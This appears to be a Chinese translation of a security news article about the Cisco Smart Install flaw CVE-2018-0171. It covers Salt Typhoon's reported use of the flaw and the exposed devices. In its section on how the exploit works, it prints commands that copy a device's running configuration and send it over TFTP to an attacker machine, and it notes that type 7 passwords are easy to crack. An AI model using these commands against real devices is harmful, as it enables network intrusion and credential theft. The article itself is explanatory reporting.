七年前的 Cisco 漏洞使 Cisco 设备面临远程代码执行攻击

Cisco 网络设备中一个存在了 7 年的漏洞继续构成重大安全风险，使攻击者能够在未打补丁的系统上执行远程代码。

CVE-2018-0171 最初于 2018 年被发现，以 Cisco 的智能安装功能为目标，这是一种即插即用的配置实用程序，旨在简化网络设备部署。

尽管年代久远，但最近的证据表明，此漏洞仍在广泛利用，凸显了未修补的遗留漏洞的持续危险。

该漏洞利用了 Cisco 智能安装协议中的一个关键缺陷，该协议在设计上缺乏身份验证要求，并且在许多 Cisco 设备上默认启用。

这种组合为攻击者创造了一场完美的风暴，因为相关服务通常在 TCP 端口 4786 上运行，该端口经常暴露在 Internet 上。

最近对 Censys 的扫描确定了 1,200 多台可公开访问智能安装的设备，这表明全球潜在易受攻击的系统持续存在。

检测到 1,239 台设备

ISC 分析师发现，该漏洞允许攻击者制作专门设计的智能安装数据包，以绕过验证检查，从而允许在受影响的设备上执行未经授权的命令。

“这个漏洞仍然特别危险，因为网络基础设施的更新周期通常比其他企业系统更长，”SANS Internet Storm Center 的研究人员在分析最近的漏洞利用尝试时指出。

该漏洞在与总部位于中国的高级持续威胁 （APT） 行为者 Salt Typhoon 相关联后重新受到关注。

据报道，该组织在 2024 年底针对电信提供商的活动中利用了 CVE-2018-0171，一位美国参议员将其描述为“我们国家历史上最严重的电信黑客攻击”。

尽管自 2018 年以来已推出补丁，但组织仍在运行易受攻击的系统，为攻击者提供现成的目标，只需最少的利用工作。

漏洞利用机制

利用过程包括连接到智能安装端口并发送特制命令。

使用智能安装漏洞利用工具 （SIET） 等公开可用的工具，攻击者可以在未经身份验证的情况下提取设备配置。

copy system:running-config flash:/config.txtcopy flash:/config.text tftp://192.168.10.2/192.168.10.1.conf

这些命令强制设备将其运行配置复制到 flash 目录，然后使用 TFTP 将其传输到攻击者的计算机。

由于 TFTP 以明文形式运行，因此攻击者可以看到整个配置（包括加密的密码）。

快速说明

使用公开已知的 Vigenère 密码加密的 7 型密码可以使用广泛可用的工具立即破解。

通过提取的配置，攻击者可以识别管理账户、网络布局和安全策略。

此信息有助于进一步渗透网络，而不会创建可疑的新帐户或生成警报。

此漏洞的存在表明，遗留的安全问题如何继续对现代基础设施构成重大威胁。

原文来自: cybersecuritynews.com